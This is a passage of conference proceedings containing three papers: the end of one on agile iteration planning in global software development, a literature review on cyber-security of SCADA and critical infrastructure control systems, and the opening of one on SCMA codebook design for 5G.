Agile projects use an iterative method to achieve incremental delivery; a project can be divided into numerous releases, which helps speed up the time it takes to get a product to market [20]. Every release is made up of numerous iterations, each of which lasts 2–4 weeks [20]. Its goal is for customers to be able to instantly see and provide comments on how the system works [20]. Every iteration is made up of numerous user stories, and the user story is the most popular technique for eliciting and expressing needs. A user story is broken down into a set of tasks in order to deliver the function [20]. Iterations or Sprints are used to break down the release. Each iteration starts with an Iteration Planning session. During it, the team decides on a list of stories that will be implemented during the iteration; this list is referred to as the sprint backlog [21]. During the iteration, the team uses engineering best practices such as Test-Driven Development, Pair Programming, and Continuous Integration. Every day, the team has a short Stand-up Meeting or Scrum Meeting to discuss progress and challenges [21]. The focus of agile project planning is on the next iteration. The project team meets after each iteration to determine the content (scope) of the following iteration (iteration backlog). The idea is that the team learns from its mistakes and improves its estimation skills over time. After a number of iterations have been completed, the team can calculate their team velocity, which is the average time spent implementing one feature [10]. When they are aware of and comprehend their planning meetings. Because iterations are brief, there is little room for error, and projections are generally accurate [10].

3 3.1

Iteration Planning in GSD: Activities and Repositories Iteration Planning in GSD Project: Activities

In this phase, the project manager should be able to continuously monitor and adjust the process according to the circumstances, be aware of cultural peculiarities of the remote team’s culture, working style, and their holiday pattern. He should be tech-savvy, unbiased, open, and able to resolve conflicts [16].

306

H. Lamsellak et al.

• Unbiased management. All members should be treated equally by senior managers, sponsors, and management, regardless of their location [15]. To demonstrate impartiality in both distribution and culture, challenging and creative work should be evenly distributed among onshore and qualified offshore team members. This will encourage distant team members to work together, promote team ownership, and eliminate friction [15]. • Conflict Resolution. Conflict can be between the team and the customer, and also between offshore and onshore teams. For the first conflict, in order to achieve cost and time benefits of GSD, a negligence of GSD problems and settings of unrealistic milestones, which may result in low quality products or undue pressure on team members [19]. As for the conflict between offshore and onshore team, the project manager should immediately resolve all the conflicts, issues and misunderstanding crop up between distributed team members during product development. Contracts should provide justice to clients as well as vendors [19]. • Task allocation. The effective allocation of tasks to distributed teams can aid in accruing the potential benefits of GSD whereas incorrect allocation can increase the risks associated with GSD and can lead to project failure [19]. The factors that can need to be considered while allocating tasks are dependencies between tasks, stability of requirements, product architecture, and size complexity of tasks to be distributed need to be regarded during task allocation in GSD. Other factors include technical expertise, temporal differences, geographic distances, resource cost, local government laws, intellectual property ownership, reliability and maturity level of vendors. Language proficiency, experience of team members, time that distributed members can devote, allocated travel budget, communication, coordination and knowledge sharing mechanism also need to be considered during task allocation [19]. • Iteration Development Process. The development team begins developing user stories in accordance with customer desire then testing activities follow. During weekly coordination meetings, a groomed backlog is established from the product backlog, and from it, developers are given high priority user stories for any possible design and analysis completion before implementation [18]. After that, developers using test-driven development (TDD) start writing unit tests for the selected user stories, let the test fail, then write the code, unit test it, refactor it if necessary and then request a code review from more experienced developers. These reviews can catch any poorly understood functionality early on and keep the quality of the code and design updated. Also, by giving developers rapid feedback on their code, they help improve knowledge exchange [18]. • Quality assurance and testing. The development team reviews the code, then hands it over to the quality assurance and testing (QAT) team for additional testing. It is then handled by the user acceptance testing (UAT) team before being handed off to the deployment team [18]. If any problems are discovered during QAT or UAT, the responsible developer fixes them and they are returned to the QAT environment. To clear up misunderstandings, lessen rework, and assist maintenance, developers can update related documenta-

Iteration Planning Process of Global Software Development











307

tion while the test team is testing the code. Additionally, they begin working with the Team Product Owner (TPO) on the preliminary design and analysis of the following user stories [18]. Global work visualization. The kanban board is a tool that distributed development teams can use to better visualize the work done at various locations and identify development bottlenecks. For GSD projects, an electronic kanban board could be maintained, with one swim lane for each team [18]. Distributed daily scrum meeting. Project teams with fewer than 15 members can conduct distributed daily scrum meetings. In the alternative, local daily scrum meetings can be held, and the Chief Product Owner (CPO) is invited to participate in sessions held wherever [18]. To reduce the time spent in meetings and eliminate any language barriers, the daily scrum questions’ replies can be mailed. It will also give the other team members time to consider solutions to the developer’s problem. If these emails are kept in a knowledge base, they can serve as a record of communications and raise developer awareness of other members’s work [18]. Pair Programming. Despite the time gap, the practice of pair programming works satisfactorily. The use of pair programming was thought to provide a number of important benefits. Both companies concluded that the code quality was excellent, and that this quality had been obtained earlier. One reason for this could be that the developers were not stumped as to what to do next. Even though there was sometimes a delay in response, engineers were anxious to be flexible in order to generate as much overlap in time as possible if one person was doubtful. Furthermore, having pairs was beneficial for testing and debugging since someone with a fresh perspective could identify issues that the pair partner could miss [7]. Sprint Planning Meeting. The meeting was divided into three parts: distributed meeting during three synchronous working hours with product owner explaining backlog items followed by consecutive site-specific parts. Distributed part arranged using teleconferencing and application sharing [14]. Sprint Demo. Arranged as distributed meeting using teleconferencing and application sharing. In this meeting, all team members, scrum master and the product owner participate on it [14]. Thanks to the sprint demo, transparency is brought to the project, and also prevented problems by providing a frequent monitoring opportuntiy between the sites [14].

3.2

Iteration Planning Repositories

In this iteration planning, we are using three repositories: the code repository, which is a repository for finished user stories’ source code, user story test cases are stored in the test repository, while documentation and ready-to-deploy user stories’ source code are stored in the release repository [18].

4

Conclusion

Global software development refers to the practice of geographically distributed software development teams. Including reducing labor costs, accessibility to

308

H. Lamsellak et al.

remote experts, increasing productivity over 24 h are the main advantages of GSD that increase the adoption of this type of development by most software companies. However, due to its distribution nature, GSD presents several challenges, which increase the probability of GSD project failure. Through the literature, multiple reports have demonstrated the effectiveness of applying agile methods on the GSD projects and their ability to attenuate an important number of its challenges. This paper gives an overview of how agile techniques might benefit dispersed projects by assisting project managers with iteration planning and providing a variety of agile strategies to consider.

References 1. Global Project Management: Communication, Collaboration and Management across Borders (2007) 2. Chadli, S.Y., Idri, A., Fern´ andez-Alem´ an, J.L., Ros, J.N., Toval, A.: Identifying risks of software project management in global software development: an integrative framework. In: 2016 IEEE/ACS 13th International Conference of Computer Systems and Applications (AICCSA) (2016) 3. Belkasmi, M.G., et al.: Global it project management: an agile planning assistance. In: Advances in Smart Technologies Applications and Case Studies (2020) 4. Ghani, I., Lim, A., Hasnain, M., Ghani, I., Babar, M.I.: Challenges in distributed agile software development environment: a systematic literature review. KSII Trans. Internet Inf. Syst. (TIIS) (2019) 5. Haig-Smith: Cloud computing as an enabler of agile global software development. Issues Inf. Sci. Inf. Technol. (2016) 6. Belkasmi, M.G., Saber, H.L., Metthahri, H.: Pre-planning process model in agile global software development. Innov. Smart Cities Appl. 5 (2022) ´ Agile practices 7. ˚ Agerfalk Helena Holmstr¨ om, P.J., Fitzgerald, B., Conch´ uir, E.O.: reduce distance in global software development. Inf. Syst. Manag. (2006) 8. Holmstrom, H., Conchuir, E.O., Agerfalk, P.J., Fitzgerald, B.: Global software development challenges: a case study on temporal, geographical and socio-cultural distance. In: 2006 IEEE International Conference on Global Software Engineering (ICGSE 2006), pp. 3–11 (2006) 9. Hossain: Scrum practices in global software development: a research framework. Product-Focused Softw. Process Improv. (2011) R Congress 10. Sonja, U.N.K.: An agile guide to the planning processes. In: PMI Global 2009 (2009) 11. Richardson, I., Marinho, M., Noll, J., Beecham, S.: Plan-driven approaches are alive and kicking in agile global software development. In: International Symposium on Empirical Software Engineering and Measurement (2019) 12. Moe: Understanding a lack of trust in global software teams: a multiple-case study. Issues Inf. Sci. Inf. Technol. (2008) 13. Niazi, M., et al.: Challenges of project management in global software development: a client-vendor analysis. Inf. Softw. Technol. (2016) 14. Paasivaara, M., Durasiewicz, S., Lassenius, C.: Using scrum in a globally distributed project: a case study. Softw. Process Improv. Pract. (2008) 15. Ralyt´e, J., Lamielle, X., Arni-Bloch, N., L´eonard, M.: A framework for supporting management in distributed information systems development. In: 2008 Second International Conference on Research Challenges in Information Science, pp. 381– 392 (2008)

Iteration Planning Process of Global Software Development

309

16. Ramesh, B., Cao, L., Mohan, K., Xu P.: Can distributed software development be agile? Commun. ACM (2006) 17. Suman, U., Jain, R.: Effectiveness of agile practices in global software development. Int. J. Grid Distrib. Comput. (2016) 18. Suman, U., Jain, R.: An adaptive agile process model for global software development. Int. J. Comput. Sci. Eng. (IJCSE) (2017) 19. Suman, U., Jain, R.: A project management framework for global software development. ACM SIGSOFT Softw. Eng. Notes (2018) 20. Tian-en, C., Zhong, S., Liping, C.: Agile planning and development methods. In: 2011 3rd International Conference on Computer Research and Development, pp. 488–491 (2011) 21. Sureshchandra, K., Shrinivasavadhani, J.: Adopting agile in distributed development. In: 2008 IEEE International Conference on Global Software Engineering, pp. 217–221 (2008)

Sensitive Infrastructure Control Systems Cyber-Security: Literature Review Tizniti Douae(B) and Badir Hassan Data and Systems Engineering Research Team, Tangier, Morocco [email protected]

Abstract. In parallel with the development of digital technologies, and integration of computer technologies into the world of process control, today we are witnessing a powerful rise in the vulnerability of information systems due to the multiplication and diversification of illegal activities in cyberspace and computer attacks that have repeatedly disrupted the functioning of the information flow and communication systems of several countries. Since Cyber-attacks are more and more evolving, the potential damage on control systems is amplified, which makes cyber security an essential component of functional security. Currently the automation of industrial infrastructures has become crucial, due to the interests and facilities it provides. And during the development of technology, SCADA systems have undergone a very remarkable change, especially during the third generation that is based on networks, and the fourth that exploits the Internet of Things and cloud computing. As a result, Supervisory control and data acquisition (SCADA) systems have become increasingly vulnerable, and their safety perimeters remain narrower. However, when it comes to remotely managing a sensitive industrial infrastructure, the security of remote management remains an essential condition, especially with the advent of a new era of intelligence that materializes in Smart-cities, Smart -grids, smart-houses, and smart-cars…. The conducted research is part of this framework, and aims to introduce the various elements of sensitive control systems, and to present the literature review of results and studies established based on various legislative and normative references dealing with the subject of the cyber-security of this kind of control systems, taking into consideration all collaborators that may have a direct or indirect impact on it. This article aims to unveil the various avenues of research that open up to the theme of cyber-security in several areas of science. Keywords: Cyber-security · Control systems · SCADA · Remote management · Cyber-war · Cyber-attack · Sensitive infrastructure

1 Introduction Currently, the technologies of information and communication (TIC), and information systems (IS), represent the core business of the vast majority of companies, organizations © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 310–319, 2023. https://doi.org/10.1007/978-3-031-35251-5_30

Sensitive Infrastructure Control Systems Cyber-Security

311

and institutions. Through these systems, we can control all the entities and state administrations, the most strategic companies, and the entire national economic fabric, which makes them more vulnerable. We understand by critical infrastructure, a socio-technical network, whose disruption or destruction of physical or cyber components, have impact on security, safety and social and economic well-being. Those consequences can be caused by natural disasters, extreme weather conditions, industrial accidents, intentional attacks, and human error [1]. Since critical infrastructures are interdependent in bi-directional way, the failure of one infrastructure can impact easily others, as cyber-space gathers 4 types of Interdependencies: physical (hardware), cybernetic, geographic or spatial, and logical layer that includes software and network protocols. Among the critical infrastructures, energetic structures are an important target of cyber-attacks, this type of infrastructure has moved in a short period of time, from isolated and protected industrial systems to an open network of interconnected technologies. This progress in digitalization ensures energy efficiency and consumption control, but it also makes the networks more vulnerable to cyber-attacks. Computer attacks can affect vital services, which is a strong argument to study the cyber security (CS) of remote-control systems from the perspective of critical infrastructure (CI) protection, taking as purpose of research to build a trustworthy technical system for remote control.

2 An Over View About Cyber-Security The cyberspace has become an important dimension of conflicts that is getting worse, involving security and state interests. Through cyberwars conducted totally or partially using cybernetics means. The purpose behind, is to make counterparts unable to use cyber-space systems efficiently. The possibility of acting remotely, makes the damage resulting from the alteration of memories and systems of transmission or control and command very important, especially since the offensive and defensive means started changing every day [3]. This is the reason why states have started to develop cyber-strategies, in order to be able to react to cyber-attacks and enhance states resilience in response to these threats. 2.1 Cyber-Security Cyberspace has become an important dimension of current conflicts, which are getting worse and worse by jeopardizing the security of a state or companies managing critical infrastructures [2] We understand by Cybersecurity, the process of protecting information through prevention, detection, and response to attacks and the purpose behind maintaining the cyber-security of an infrastructure is to come from a cyber-attack that can disrupt power, electricity, security and financing systems [1–4]. The cyber risk is materialized in the form of material and physical damage caused by a cyber-attack.

312

T. Douae and B. Hassan

2.2 Cyber-Attacks Among the different types of cyber-attacks, we distinguish: • Denial of service attack; it aims to locate an unsecured Internet access accessible from the outside and then flooding the control station and servers with requests that exceed its processing capacity. Until it becomes inoperative, inaccessible, and unable to control its production [2]. • Attack via wireless network: When facilities are connected by wireless networks the protection and security become insufficient, which causes the infiltration into the network from outside and eventually unauthorized access to trade secrets. • Attack by malicious employee: In this case the internal origin of the sabotage is a corrupted employee or in cold with his employer, having important access rights on the network, It can make a part of the computer system inoperative and entrain the stopping of the main functionality of a specific infrastructure. • Attack by Malware: aims to retrieve confidential information or modify it. Those programs are auto-installed and have the ability to recover sensitive data without the owner’s knowledge. Cyber-attacks exploit vulnerabilities that are unknown to a system. They have as main targets sensitive data such as financial data and customer files, Production IT systems, and remote-control systems for industrial and logistics infrastructures. The internal and external factors of a successful attack are: • • • •

Lack of prevention, and awareness among employees. Lack of visibility on the IT environment (network routing) Proprietary and obsolete software and operating systems. Security team not skilled in malware scanning, cyber-diagnosis, incident response and threat monitoring.

Organizations need to reassess the SCADA control systems and risk model to achieve in depth defense solutions for these systems. The strategy to deal with cyber-attacks against the nation’s critical infrastructure requires first understanding the full nature of the threat. A depth defense and proactive solutions to improve the security of SCADA control systems in order to ensure a security and survivability of critical infrastructure [5]. Considering the variety of cyber-attacks, while establishing research on critical infrastructure cyber-security it is important to consider also the social, and political dimension as well as technical dimension.

Sensitive Infrastructure Control Systems Cyber-Security

313

2.3 Cyber-Defense Cyber defense refers to all the activities carried out by the Ministry of Defense in cyberspace to ensure the proper functioning of the armed forces [7]. Each state must build its own cyber-power, The militarization of cyberspace corresponds to a military culture [13]. Three bodies that need to cooperate on cyberspace to strengthen cyberspace are as follows: • Organizations responsible for military and government infrastructure. • Organizations in charge of critical infrastructure protection. • Representatives of private economic bodies. 2.4 Impact of Cyber-Attacks Enterprises can be victims of Cyber-attacks, any company large enough to succeed in the market is a potential target and also small businesses are not immune [8]. Organizations need to reassess the SCADA control systems and risk model to achieve in depth defense solutions for these systems. The strategy to deal with cyber-attacks against the nation’s critical infrastructure requires first understanding the full nature of the threat. A depth defense and proactive solutions to improve the security of SCADA control systems ensures the future of control systems and survivability of critical infrastructure. The impact and damage caused by a cyber-attack can be symbolic through the damage to image and reputation. or real, such as [7]: • Destruction of economic wealth and destabilization of organizations. • Disclosure of sensitive data, • Material damage to property persons, and Public health risks [9] In an interconnected world, cybernetic damage can quickly affect neutral people or friends. Simple software can paralyze critical infrastructure such as water and electricity distribution, and can also impact industrial infrastructure by paralyzing production and causing the supply and production chain stop. 2.5 Consequences of Cyber-Attacks As a result of the cyber-attacks, companies are faced with several consequences, including: • The identification of attacks that require the detection of several events occurring on the company’s infrastructure. • Generation of many security events to process, analyze, sort and respond to them quickly enough. • Lack of a complete response process (definition of risk level, initial analysis, investigation, containment, diagnosis).

314

T. Douae and B. Hassan

• Lack of visibility into operations when using a stolen ID and authentic software, concealing any system violations. • Difficulty in identifying the expertise to be developed internally, and the security task to be outsourced and that to be entrusted without fear to automated systems. • Unreadiness to take on all high-level tasks internally. • Outsourcing of incident management processes: Malware Scanning, Cyberdiagnostics, Incident Response, Threat Scanning. • Internally Management of: Risk level definition, Prioritization, Rapid recovery

3 Critical Infrastructures: The critical infrastructures includes machines, technology, humans, organizations, and institutions, such structure requires the integration of Trust, knowing that this term is socially referring to a state of expectation that focuses on competence, accountability, and morals, technically, it is related to dependability, reliability, predictivity, failure rate, false alarms, transparency, security, and performance, and those are the main aspects that should mark a critical infrastructure The information systems used in , have become more developed and complex. The treatment of safety, security and trust, remains weak compared to what the situation requires. CIs are social-technical networks, whose disruption, or destruction of its physical or cybernetic components, impacts safety, security and social and economic well-being, which can be caused by [1]: • • • • •

A natural disaster Extreme weather conditions Industrial accidents. Deliberate attacks. Human errors.

Critical infrastructures are interdependent. This interdependence is bidirectional and each depends on the other. The failure of a single infrastructure easily affects the others. Hence the need to understand the type of interdependencies in order to characterize CIs. These interdependencies are classified into 4 categories [1]: • Physical interdependencies: link between 2 physical CIs, for example the power supply to a pumping station. • Cybernetic or informational interdependencies, such as SCADA communication infrastructures. • Geographical or spatial interdependencies: 2 CIs in the same place. • Logical interdependencies: Financial.

Sensitive Infrastructure Control Systems Cyber-Security

315

Most Critical infrastructures are based on ICTs, which makes them sensitive. Hence the need to address the subject of critical infrastructure protection and study the cybersecurity of there IS because these attacks can affect vital services [1]. Among the existing critical infrastructure, we state: • • • • •

Energetic critical infrastructure Water treatment & distribution infrastructure Industrial infrastructure Railway’s infrastructure Oil and gas facilities

4 Research Perspectives The critical safety of industrial SCADA networks is exposed to myriad security problems of the internet, which can cause significant damage to the critical infrastructure. An attack against a SCADA network might also adversely affect the environment and endanger public safety, and also can cause physical and economic loss to the company. Therefore, security of SCADA networks has become a prime concern for all governments [2]. The treatment of safety, security and confidence of CIs remains low compared to what the situation requires. Most researches remain within a limited interaction perimeter, usually of two agents (systems, user/attacker or both). With the objective of building powerful and fast defenses against attacks, and repairing those that already exist; Research in the field of security in cyberspace must take into consideration for each country, other measures: interpersonal, organizational, systematic, and technical [1]. 4.1 Social Dimension Studies that focus on security and trust related to information system (IS) security and safety for critical infrastructure (CI) protection are rare [1]. However, they are generally carried out by engineers, in the context of “trust worthy computing”, the human and social domain is practically absent. Trust is based on the interaction of two agents: Man-system, Human-System, Manman The value of the information stored in these systems is very important, it attracts the attention of users to good or bad times (cyber attackers). Hence the importance of including all the human and social sciences. Research in social and human science, or what is known as social engineering; addressing the theme of trust and security of information systems, should enable us to understand the role of trust in social decisions and behaviors, by creating trustworthy socio-technical systems, as well as the means by which we can measure this criterion

316

T. Douae and B. Hassan

The industrial safety assessment shall take into consideration the following elements: • Technology. • The human factor. • The organizational factor around a framework model that defines the complexity of industrial security. • The lack of mutual understanding due to the variety of expectations. • Characterization of external vulnerabilities and their potential social impacts. 4.2 Political Dimension Cyber-attacks impact international relations, and define geopolitical opportunities [8]. The protection of CIs is a political concern; political strategies are needed to strengthen the security of CI information [1]. The gradual affirmation of the legal dimension of cyberspace will inevitably be influenced by political interests and in line with the current governance of cyberspace [9]. Politics will have to innovate and establish its objectives, rules and priorities, to fit with the current cyber situation, in order to preserve critical infrastructures [3]. 4.3 Technical Dimension Factories are becoming more and more ultra-connected; soon customers will be able to order and monitor the production of their products in real time. If this ultra-connectivity is not protected and secured, it will be difficult to achieve it. The evolution towards industry 4.0 uses new communication protocols, which embed data protection mechanisms (encryption, integrity verification, authentication...) Remote control of installations and automated robots encourages the development of connected industrial objects, which further exposes data to a risk of loss of control, hence the need to take cyber-security into account from the design of products phase. A cyber-attack involves the use of a vulnerability in the protection of a site or IS, to take illegitimate power. In this case, three dimensions are mixed: espionage, perversion of the functioning of a system and revelation of information. A government must be able to distinguish between individuals who may be prosecuted by a local or international criminal court. • The industry secured by conception/Security by design: Production sites have become targets of cyber-attacks as they are increasingly connected. The remedy in this case is design-safe industry The safety of industrial systems from the design stage (writing specifications and expressing requirements by end user), has become essential [9]. Based on the certification criteria and tests through which products bearing the cybersecure label pass. Research can be conducted in the sense of developing PLCs and/or the communication system to provide them with the ability to ensure cyber security from the design stage. For this purpose it is recommended to: Research the mechanisms of

Sensitive Infrastructure Control Systems Cyber-Security

317

cyber security, define the qualification criteria for PLCs so that they can be certified, Consider the human factor in the design of a secure system. • Study the vulnerability of critical infrastructures: Critical infrastructures and production systems are always connected to the Internet with negligible protection, which makes them an attractive target for attackers with the necessary resources. Well-established threats target the destruction or targeted disruption of essential services. With the possibility that a cyber-espionage attack could take place in a tense geopolitical context [8]. The study of these vulnerabilities consists in identifying, understanding and analyzing the vulnerabilities and interdependencies of CIs, with the aim of predicting and mitigating and responding to security threats by taking into consideration their impacts. • Study the impact of maintenance on the cyber-security of equipment: Even if we initially equip our remote management system with all the existing means known to their cyber security assurances, there comes a day when our equipment will need maintenance actions, whether corrective or preventive, in this case, the vulnerability of our system increases and a malicious program can easily infiltrate, especially with the outsourcing of the maintenance service. For this reason, it seems interesting to conduct a study in this direction, and to show the impact that maintenance has on the cyber-security of remote management systems. • Computer weapons: Intrusion detection and traceability: Cyber-attacks are known by their opacity, generally it is difficult to ensure traceability and identify the perpetrator and/or the person responsible for an attack or act of cybercrime. A cyber-attack involves the use of a vulnerability in the protection of a site or IS, to take illegitimate power. In this case, three dimensions are mixed: espionage, perversion of the functioning of a system and revelation of information. A government must be able to distinguish between individuals who may be prosecuted by a local or international criminal court. Computer attackers use relay servers to cover their tracks, which prevents them from being easily identified [2]. Research in SCADA seems to be mostly dedicated to security issues. Lack of Intrusion Detection Systems (IDS) for SCADA is one of the challenges addressed. The problem of some approaches is that they assume certain patterns without having empirical results to support them. Measurement should be an essential part of IDS SCADA research. An intrusion can be detected by identifying abnormal symptoms of the industrial installation, corresponding to deviations from normal and expected operation, by evaluating the connected industrial objects (PLCs, sensors, transmission systems...) and by mapping the industrial networks to know the number of connected machines. These operations can be performed by third parties called audit and intrusion test providers

318

T. Douae and B. Hassan

• Develop management tools: It is necessary to develop management tools other than SMSSI, which take into consideration the different layers of CI, the cybernetic physical layers, and organizational, strategic business on a national and international scale. As well as human factors in the design of a secure system. • Simulation of attacks: One of the problems with industrial systems simulation is that, unlike computer systems, there is not a large database of vulnerabilities or security advisories from which to build realistic scenarios of possible attacks, nor to interpret their consequences. • Machine learning use to ensure cyber security: Integrate the principle of “machine learning” into the remote management system so that it is able to react autonomously to cyber-attacks.

5 Conclusion This article aimed to introduce different concepts related to cyber security, and cyberspace in order to analyze the cyber-attacks, and the results of the current researches, to be able to draw in a detail the perspectives of research in the field of cyber security of remote-control systems that manages critical infrastructures, by approaching all the possible dimensions not only the technical dimension.

References 1. Rajaonah, B.: A view of trust and information system security under the perspective of critical infrastructure protection. Revue des Sciences et Technologies de l’Information - Serie ISI: Ing_enierie des Syst_emes d’Information, Lavoisier, 22(1), 109 (2017) 2. Baud, M.: La cyberguerre n’aura pas lieu, mais il faut s’y préparer, Politique étrangère 2(Eté), pp. 305–316 (2012). https://doi.org/10.3917/pe.122.0305 3. Huyghe, F.-B.: Des armes à la stratégie. Revue Internationale et Stratégique 3(87), 53–64 (2012). https://doi.org/10.3917/ris.087.0053 4. Clérot, F., Mayor, V.: Jeu de Go dans le cyberespace, Revue Internationale et Stratégique 3(87), pp. 111–119 2012/. https://doi.org/10.3917/ris.087.0111 5. Hahn, A., Ashok, A., Sridhar, S., Govindarasu, M., et al.: Cyber-physical security testbeds: architecture, application, and evaluation for smart grid. IEEE Trans. Smart Grid 4(2), 847–855 (2013). https://doi.org/10.1109/TSG.2012.2226919 6. Igure, V.M., Laughter, S.A., Williams, R.D., et al.: Security issues in SCADA networks. Comput. Secur. 25(7), 498–506 (2006). https://doi.org/10.1016/j.cose.2006.03.001 7. Kempf, O.: Cyberstratégie à la française. Revue Internationale et Stratégique 3(87), 121–129 (2012). https://doi.org/10.3917/ris.087.0121

Sensitive Infrastructure Control Systems Cyber-Security

319

8. Kaspersky repports 2017. [1] K. E. Cybersecurity, “Rapport sur les menaces en Afrique du Nord en 2017,” 2017. [2] M. Garnaeva, F. Sinitsyn, and Y. Namestnikov, “STATISTIQUES GLOBALES DE L ‘ ANNEE 2016,” 2016. [3] GReAT, “Fileless attacks against enterprise networks,” SecureList, p. 1, 2017. [4] S. Kaspersky and A. Targeted, “Protection contre les menaces avancées et atténuation des risques d’attaques ciblées Solution Kaspersky Anti Targeted Attack.” [5] “1- Kaspersky-Security-Bulletin-2016_Predictions-2017.” 9. Auditeurs, T.D.E.S.: De La Connexion Internet (2014)

Design of SCMA Codebook Based on QAM Segmentation Constellation Afilal Meriem1(B) , Hatim Anas1 , Latif Adnane1 , and Arioua Mounir2 1 TIM Team, ENSA, Cadi Ayyad University, Marrakech, Morocco

[email protected] 2 ENSA, Abedelmalek Essaidi University, Tetouan, Morocco

Abstract. Non-orthogonal multiple access (NOMA) has been envisioned as a promising multiple access (MA) technique for the fifth generation (5G) mobile systems. The spectral efficiency can be significantly improved to further enhance the emerging new technologies supported by the fifth generation wireless networks. The idea behind NOMA is serving multiple users simultaneously via different power levels or/and codebooks. Based on the non-orthogonal spreading technique, Sparse code Multiple Access (SCMA) was proposed as a multi-dimensional constellation codebook. Herewith, an optimized design of the sparse code multiple access codebook is presented in detail. We highlighted the design of each element (Mapping matrix F, Mother Constellation (MC), Sub-constellation generation, Mapping process) needed to generate these codebooks. The optimization of the codebooks remains in the minimum Euclidean distance (MED) maximization between adjacent points within the same dimension of the codebook (AP-MED), plus MED maximization of superimposed codewords sharing the same resource elements (CW-MED). Also, the design of the mapping matrix F with Progressive Edge Growth Algorithm (PEG) is presented. The proposed SCMA codebooks are designed and displayed in the paper. In the end, the comparison shows that the proposed codebooks have acceptable results in term of MED maximization, while other domains are further to investigate.

1 Introduction Future 5G wireless networks such as Internet of Things (IoT) and Multiple-Input Multiple-Output (MIMO)… are expected to support very diverse traffics with much tighter requirements. While the fourth-generation (4G) communications with wireless orthogonal multiple access (OMA) had difficulties satisfying the rapid development of all new communication technologies. SCMA was proposed as one of the NOMA technologies envisioned as a key component in the 5G mobile systems [1]. The SCMA system performance is decided by the codebook design, in which the codebook is a complex multi-dimensional constellation. The design process is a multistage approach, under which the optimization of the complex multi-dimensional constellation is the main problem of the SCMA codebook design. Under the multistage approach, each step could be optimized considering various key performance indicators such as: © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 320–327, 2023. https://doi.org/10.1007/978-3-031-35251-5_31

Design of SCMA Codebook Based on QAM Segmentation Constellation

321

Minimizing SER (Symbol Error Ratio), in [2] the codebook design was reduced to the design of a finite number of complex numbers representing the constellation points. In the process, the SER minimization over these variables is accomplished with the help of the Differential Evolution (DE). Maximizing MED, in [3] the design of an MC is based on a 16 -star QAM, then the codebook is generated with a maximum MED between the point-to-point within the same dimension of the codebook. On other hand, with [4] the idea of MED maximization is studied with a newer definition of MED, namely, the MED of superimposed codewords (CW-MED). Instead of optimizing the Euclidean Distance between adjacent points (AP-MED) within the same dimension of each codebook, the studies are conducted on the user’s codewords overlapping on the same subcarrier to establish a larger MED. The max-min optimization was resolved by a Semidefinite Relaxation (SDR). Moreover, recent studies as [5] and [6] have been combining the maximization of both MEDs, AP-MED along with CW-MED. The MED maximization helps improve the system’s error rate performance by reducing the collisions of the information bits on the resources. Thus, our main goal is applying the approach of MED maximization within the two aspects: AP-MED and CW-MED, to design our SCMA schemes. The contributions of this study are listed as follows: We highlighted the design of the mapping matrix, which is used to be provided as a by default design fed to the SCMA system. Therefore, we used a PEG algorithm to help generates the mapping matrix, with a relatively large girth. Then, we constructed an MC with large MED, and after that, generates codebooks with large MED between the interfering users. The rest of this paper is organized as follows. Section 2 introduces the SCMA system model. In Sect. 3, the mapping matrix generation is presented based on a PEG algorithm. Section 4 shows how to form the MC, and details the procedures to generate sub-constellations from the MC, then assigning them to the users while increasing the MED. Section 5, a design example is presented where the optimized SCMA codebook is produced. In Sect. 6, a comparison and analyses are presented. Finally, Sect. 7 concludes the paper.

2 System Model The SCMA encoder, responsible for generating user’s codebooks, is defined as a map from log2 (M) bits to a K -dimensional complex codebook of size M. The constellation points of each codebook are constructed from the MC by constellation segmentation. Then based on the sparse matrix F, the coded bits are mapped into the SCMA codewords. The K -dimensional complex codewords of the codebook are sparse vectors with N < K non-zero entries. Finally, the SCMA codewords are transmitted over shared orthogonal resources. The received signal can be expressed as: J hj .xj + n (1) y= j=1

Where xj = (x1,j , x2,j , . . . , xk,j ) is a K-dimension complex codeword of user j, hj denotes the channel coefficient of user j and n is the ambient noise. T

322

A. Meriem et al.

3 Sparse Mapping Matrix F with PEG The relationship between users and subcarriers is determined based on a sparse mapping matrix F, which decides on the decoder complexity. Here, we propose to design the matrix F with the PEG algorithm. The PEG algorithm is a construction method used for LDPC codes, and its high flexibility makes it a good candidate to generate codes of any block length [7], hence the SCMA mapping matrix F. A bipartite graph with K check nodes (rows) and J symbol nodes (columns) can be created using F. Such a graph is also called a Tanner graph, Fig. 1. The symbol degree sequence Ds = {ds1 , ds2 , . . . , dsJ } denotes the number of check nodes connected to each symbol node.

Fig. 1 Factor graph representation of an SCMA system with J = 6, K = 4 and Ds = {2, 2, 2, 2, 2, 2}.

Given the graph parameters as the number of symbol nodes J, the number of check nodes K, and the symbol node degree sequence Ds . We proceed with nodes connections according to the following Algorithm 1.

Design of SCMA Codebook Based on QAM Segmentation Constellation

323

4 SCMA Codebook Design 4.1 Mother Constellation - MC For the multidimensional constellation design choice, SCMA has more freedom degrees than previous techniques [8]. Thus, we choose a constellation with a large MED that avoids collisions between users. Herewith, we propose to design the MC using a 16 Star-QAM constellation, which is then extended and built on four ring signal sets with radius Ri, as shown in Fig. 2.

Fig. 2 (a) Constellation of round 16 QAM. (b) Proposed constellation.

Where: |OA| = R1, |OB| = R2, |OC| = R3, |OD| = R4. In a general case, the MC parameters can be written as: ⎞ ⎛ x1 x2 αx1 βx2 ⎜ −x1 −x2 −αx1 −βx2 ⎟ ⎟ (2) MC = ⎜ ⎝ x1 eiθ x2 eiθ αx1 eiθ βx2 eiθ ⎠ −x1 eiθ −x2 eiθ −αx1 eiθ −βx2 eiθ

